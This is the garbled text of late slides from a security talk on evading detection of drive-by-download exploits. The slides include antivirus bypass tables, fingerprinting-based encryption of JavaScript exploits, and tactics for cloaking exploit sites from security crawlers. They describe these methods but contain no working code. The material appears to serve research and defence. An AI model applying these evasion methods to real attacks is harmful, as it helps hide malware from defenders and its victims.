  82. 82. ANTIVIRUS DESKTOP VERSION IS MUCH STRONGER
  83. 83. ANTIVIRUS DESKTOP VERSION • Can monitor host environment – Hook into browsers – Easier to get raw form of exploit • Behavior analysis – Buffer overflow behavior – Download to file behavior Download-to-file
  84. 84. AntiVirus Desktop Kung Fu To Ag Sc Aa Ky Plain ✖ ✖ ✔ ✔ ✔ Random variables ✖ ✖ ✔ ✔ ✔ Split literals ✖ ✖ ✔ ✔ ✔ Injection SC Injection SC ✖ ✖ ✔ ✔ ✔ Concat SC ✖ ✖ ✔ ✔ ✔ Concat CODE ✖ ✔ ✖ ✔ ✔ Concat SC + Concat CODE ✖ ✖ ✖ ✔ ✔ Inject SC + Concat CODE ✖ ✖ ✖ ✖ ✔
  85. 85. AntiVirus Desktop Kung Fu To Ag Sc Aa Ky M Plain ✖ ✖ ✔ ✔ ✔ ✔✔ Random variables ✖ ✖ ✔ ✔ ✔ ✔✔ Split literals ✖ ✖ ✔ ✔ ✔ ✔✔ Injection SC Injection SC ✖ ✖ ✔ ✔ ✔ ✖✔ Concat SC ✖ ✖ ✔ ✔ ✔ ✖✔ Concat CODE ✖ ✔ ✖ ✔ ✔ ✖✔ Concat SC + Concat CODE ✖ ✖ ✖ ✔ ✔ ✖✔ Inject SC + Concat CODE ✖ ✖ ✖ ✖ ✔ ✖✔
  86. 86. LIVE DEMO 2 DESKTOP ANTIVIRUS BYPASS
  87. 87. 5. FINGERPRINTING- BASED ENCRYPTION
  88. 88. Wepawet doesn’t tell much 88
  89. 89. 89
  90. 90. 90
  91. 91. 91
  92. 92. 92
  93. 93. Browser Feature Table IE7 FF Safari Opera Chrome Is_contextmenu_event_supported Is contextmenu event supported True True True False True String_prototype_replace_ignore_functions False False True (2.0.2) False False Is_ES5_strict_mode_supported False False False False False Array_prototype_slice_can_convert_to_array Array prototype slice can convert to array False True True True True Getelementsbytagname_returns_comment_nodes True False False False False Is_element_tagname_uppercased True True True True True Is_canvas_element_supported False True True True True Is_DOMFocusIn_supported False False True True True Is_CSS_boder_radius_supported False True True False True Function_identified_leaks_onto_enclosing_scope True False False False False Script_element_rejects_textnode_appending True False False False False Is_contextmenu_event_supported True True True False True Is_position_fixed_supported False True True False True Computed_style_return_static_positioned_element False False False True False 93
  94. 94. 5. Fingerprinting-Based Encryption Summary • "This exploit works only for IE6" This IE6 • "Give me an encrypted version of my javascript exploit” j i t l it” • "Give me javascript to generate the decoding key" • "The key is only correctly generated if the y y yg javascript is run under IE6" 94
  95. 95. 5. Fingerprinting-Based Encryption Summary A=Check1(); B=Check3(); C=Check4(); D Check6(); D=Check6(); E=Check8(); F=Check9(); (); G=Check12(); H=Check14(); 95
  96. 96. 5. Fingerprinting-Based Encryption Summary A=Check1(); A=Check6(); B=Check3(); B=Check12(); C=Check4(); C=Check8(); D Check6(); D=Check6(); D Check1(); D=Check1(); E=Check8(); E=Check4(); F=Check9(); (); F=Check14(); (); G=Check12(); G=Check3(); H=Check14(); H=Check9(); 96
  97. 97. 5. Fingerprinting-Based Encryption Summary A=Check1(); A=Check6(); One‐time key B=Check3(); B=Check12(); C=Check4(); C=Check8(); D Check6(); D=Check6(); D Check1(); D=Check1(); E=Check8(); E=Check4(); Encrypt F=Check9(); (); F=Check14(); (); javascript G=Check12(); G=Check3(); exploit l H=Check14(); H=Check9(); Generate decoding 97 javascript
  98. 98. Why not Anti-Virus? • AV is to install on desktops / notebooks p • Complicated normal behaviors • Strict resource constraints • Therefore, AV and gateway vendors rely on: – Signature-based pattern matching technologies – LIGHTWEIGHT and ACCURATE • Why can’t such technology used to detect drive-by-downloads? 98
  99. 99. Javascripts are not harmful to th t the environment… i t 99
  100. 100. … so they are usually not reused AV no good because drive-by-downloads are in: g y • Disposable Javascript • Disposable PDF Adobe JS • Disposable Flash actionscript • All ECMA- scripts you don't usually reuse them… 100
  101. 101. Javascript Packing Is a Norm • Packing is widely used by legitimate code! – To protect javascript source code – To reduce javascript size • Google Closure Compiler – http //code google com/clos e/compile / http://code.google.com/closure/compiler/ • Yahoo Javascript Packer (YUI Compressor) – http://developer.yahoo.com/yui/compressor/ p // p y /y / p / • Advanced HTML Protector – http://www.creabit.com/htmlprotect/ • D Dean Edwards’ Packer Ed d ’P k – http://dean.edwards.name/packer/ • Online JS Obfuscator – http://www.iwebtool.com/html_encrypter • http://www.cha88.cn/safe/fromCharCode.php 101
  102. 102. … OK so AV doesn t work (that well)… doesn’t well) How about behavior-based approaches? 102
  103. 103. Defeating Behavior Analysis 1. Use VBScript – Exploits in VBScript – URL generators in VBScript – Exploits in / generated by VBScript – May defeat SpiderMonkey et al (Rhino, JSunPack, etc) 2. Don’t serve to detectors – You can’t detect what you don’t have – Serve to each IP only once – Detect agent strings – Collect robot IPs—Google, Yahoo, security vendors 103
  104. 104. Defeating Behavior Analysis 3. Fingerprint-based encryption g p yp 3. Little b effective techniques l but ff h – Sleep(30000); //using SetTimeout – Timelock puzzles 104
  105. 105. Future Work • Randomly chop up scripts and split into individual f l d d l files • Generating VBscript instead of javascript g p j p • Encrypting using data existing outside of HTML – HTTP headers
  106. 106. Discussion • The Panopticlick experiment by p p y Eckersley of EFF – 94.2% of "typical desktop browsers” are unique yp p q • Can fingerprinting-based encryption be integrated with this type of individual fingerprinting, to prevent detection and analysis of target attacks?
  107. 107. THANK YOU! wayne@armorize.com @waynehuang @drivesploit http://www.drivesploit.org http://www drivesploit org Credits: wayne huang, fyodor yarochkin, g antonio rohman fernandez Special thanks to: Benson Wu, Jeremy Chiu, Kuon Ding Felix, Cola Ding, Felix
  108. 108. References • James Lee, Using guided missles in drive-bys http://www.slideshare.net/egypt/using guided missiles in http://www slideshare net/egypt/using-guided-missiles-in- drivebys-automatic-browser-fingerprinting-and-exploitation-with- the-metasploit-frameworks-browser-autopwn • Sebastian Porst, How to really obfuscate your , y y PDF malware http://www.slideshare.net/cblichmann/how- to-really-obfuscate-your-pdf-malware • Jeremy Chiu, 0box analyzer: afterdark runtime forensics for automated malware analysis and clustering http://www.slideshare.net/wayne_armorize/0-box-analyzer- afterdark-runtime-forensics-for-automated-malware-analysis-and- ft d k ti f i f t t d l l i d clustering-2 • HeapLib support added to Metasploit 3 http://blog.metasploit.com/2007/04/heaplib-support-added-to- http://blog metasploit com/2007/04/heaplib support added to metasploit-3.html

×